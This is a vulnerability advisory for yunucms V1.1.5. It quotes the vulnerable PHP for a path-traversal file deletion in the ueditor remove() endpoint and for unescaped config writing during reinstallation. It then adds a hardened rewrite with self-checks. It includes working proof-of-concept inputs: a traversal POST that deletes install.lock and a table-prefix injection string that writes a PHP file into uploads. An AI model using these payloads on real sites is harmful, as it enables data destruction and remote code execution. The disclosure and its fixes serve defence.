Description
Two issues were discovered in yunucms V1.1.5.
1. Arbitrary File Deletion
2. Launch a new installation process to execute PHP code
1. There is an Arbitrary File Deletion vulnerability which allows remote attackers to unlink any file.
The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
lines 34-68
public function remove(){
    $file = trim($_POST['key']);
    $config = $this->config;
    $root_path = $config['root_path'];
    // security check
    $pathlist = explode("/", $file);
    if ($pathlist[0] != 'uploads' && $pathlist[1] != 'uploads') {
        return array(
            'state' => 'ERROR',
            'error' => 'Folders start from uploads'
        );
        exit();
    }
    $file_path = $root_path.$file;
    if( file_exists($file_path) ){
        $result = @unlink($file_path);
        if( $result ){
            return array(
                'state' => 'SUCCESS'
            );
        }else{
            return array(
                'state' => 'ERROR',
                'error' => 'delete file error'
            );
        }
    }
    return array(
        'state' => 'ERROR',
        'error' => 'file not exists'
    );
}

In the remove() function shown above, the content of $_POST['key'] is used in the call to unlink() without any authentication or sanitization; the only check is that one of the first two path segments equals 'uploads', which does not prevent "../" traversal out of that directory.
POC
url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock
/data/install.lock has been removed.
2. Launch a new installation process to execute PHP code
After removing /data/install.lock, remote attackers can launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
lines 117-131
// modify the database config file
$coffile = CONF_PATH.DS.'database.php';
Config::load($coffile, '', 'database');
$conflist = Config::get('','database');
$param = array(
    'hostname' => $data['DB_HOST'],
    'hostport' => $data['DB_PORT'],
    'database' => $data['DB_NAME'],
    'username' => $data['DB_USER'],
    'password' => $data['DB_PWD'],
    'prefix' => $data['DB_PREFIX']
);
setConfigfile($coffile, array_merge($conflist, $param));
$showstr .= show_msg('配置数据库信息完成...');

Following the function setConfigfile(), in the /app/admin/common.php file:
lines 76-87
// write the config file
function setConfigfile($file, $arr){
    $str="<?php \nreturn [\n";
    foreach($arr as $key=>$v){
        /*$v = htmlspecialchars_decode($v);
        $v = htmlspecialchars($v);*/
        $str.= "\t'".$key."'=>'".$v."',\n";
    }
    $str.="];\n";
    file_put_contents($file, $str);
}

setConfigfile() uses file_put_contents() to write $arr into $file (config\database.php), concatenating each value into single-quoted PHP source with no escaping (the htmlspecialchars lines are commented out), so a value containing a single quote breaks out of the string literal.
POC
In installation step setup2, we can enter the following into the 数据表前缀 (table prefix, DB_PREFIX) field: yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'

When the installation process finishes, /data/database.php looks like this:

Visiting the homepage http://127.0.0.1:81 will create the file /uploads/image/f4ck.php
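A hardened version of both routines, added here as an example and not taken from yunucms (the names safeRemove, safeSetConfigfile and check are assumptions): the first canonicalises the requested path and refuses anything outside the uploads directory, the second serialises the config with var_export() so a table prefix containing quotes is stored as data rather than executed as code.

```php
<?php
// Added example, not yunucms code: hardened counterparts to the remove() and
// setConfigfile() routines quoted above. Function names are assumptions.
// Issue 1: canonicalise the path and require it to stay under <root>/uploads,
// so "../" segments in key cannot reach /data/install.lock or anything else.
function safeRemove(string $key, string $rootPath): array
{
    $uploadsDir = realpath($rootPath . DIRECTORY_SEPARATOR . 'uploads');
    if ($uploadsDir === false || strpos($key, "\0") !== false) {
        return ['state' => 'ERROR', 'error' => 'invalid request'];
    }
    // realpath() is false for missing files and resolves every ".." for us.
    $target = realpath($rootPath . DIRECTORY_SEPARATOR . ltrim($key, '/\\'));
    if ($target === false || !is_file($target)
        || strpos($target, $uploadsDir . DIRECTORY_SEPARATOR) !== 0) {
        return ['state' => 'ERROR', 'error' => 'file not in uploads'];
    }
    return unlink($target) ? ['state' => 'SUCCESS']
                           : ['state' => 'ERROR', 'error' => 'delete file error'];
}

// Issue 2: emit the config as PHP literals via var_export(), which escapes
// quotes and backslashes, instead of splicing raw values into source text.
function safeSetConfigfile(string $file, array $arr): bool
{
    foreach ($arr as $v) {
        if ($v !== null && !is_scalar($v)) {
            return false;  // only plain scalars belong in database.php
        }
    }
    $src = "<?php\nreturn " . var_export($arr, true) . ";\n";
    return file_put_contents($file, $src, LOCK_EX) !== false;
}

// Self-check on a constructed temporary tree: the PoC key must be refused, and
// a prefix containing quotes must round-trip as data rather than as code.
function check(bool $ok, string $what): void { if (!$ok) { fwrite(STDERR, "FAIL: $what\n"); exit(1); } }
$root = sys_get_temp_dir() . '/yunu_demo_' . getmypid();
mkdir("$root/uploads/image", 0700, true);
mkdir("$root/data", 0700, true);
touch("$root/data/install.lock");
touch("$root/uploads/image/a.jpg");
check(safeRemove('/uploads/../data/install.lock', $root)['state'] === 'ERROR', 'traversal blocked');
check(file_exists("$root/data/install.lock"), 'install.lock intact');
check(safeRemove('uploads/image/a.jpg', $root)['state'] === 'SUCCESS', 'legitimate delete');
$prefix = "yunu_',].die('x');\$a=['a'=>'";
check(safeSetConfigfile("$root/data/database.php", ['prefix' => $prefix]), 'config written');
check((include "$root/data/database.php")['prefix'] === $prefix, 'prefix stored as data');
echo "all checks passed\n";
```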

